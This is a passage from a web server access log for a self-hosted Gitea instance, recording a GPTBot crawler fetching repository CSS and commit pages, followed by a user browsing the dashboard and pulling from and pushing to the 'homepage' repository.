+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" -[17/Feb/2026:19:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" -[17/Feb/2026:19:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css/style.css" [Client 74.7.227.38] [Length 14462] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" -[17/Feb/2026:19:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10108] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" -[17/Feb/2026:19:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css" [Client 74.7.227.38] [Length 21527] [Gzip 6.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:19:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 18466] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:19:55:26 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:19:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20053] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20086] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" -[17/Feb/2026:19:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10100] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" -[17/Feb/2026:19:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" -[17/Feb/2026:19:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13195] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" -[17/Feb/2026:19:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" -[17/Feb/2026:19:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/swagger.css?v=1.25.3" [Client 74.7.227.38] [Length 23395] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/api/swagger" -[17/Feb/2026:19:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" -[17/Feb/2026:19:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 20586] [Gzip 15.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" -[17/Feb/2026:19:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 6358] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" -[17/Feb/2026:19:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13165] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" -[17/Feb/2026:19:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13195] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" -[17/Feb/2026:19:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" -[17/Feb/2026:19:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13194] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" -[17/Feb/2026:19:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13201] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" -[17/Feb/2026:19:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13193] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" -[17/Feb/2026:19:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fstyle.css.justbefore" [Client 74.7.227.38] [Length 27164] [Gzip 9.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" -[17/Feb/2026:19:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13193] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" -[17/Feb/2026:19:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13193] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" -[17/Feb/2026:19:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13194] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" -[17/Feb/2026:19:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:19:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13115] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" -[17/Feb/2026:19:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" -[17/Feb/2026:19:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore?display=source" [Client 74.7.227.38] [Length 18483] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" -[17/Feb/2026:21:30:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11653] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:46 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:21:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405177] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:31:42 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:21:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:21:31:42 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:21:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 222] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:21:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 222.117.41.51] [Length 17629] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:21:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 391] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:25:50 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:22:25:50 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:22:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:22:25:59 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[17/Feb/2026:22:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11575] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 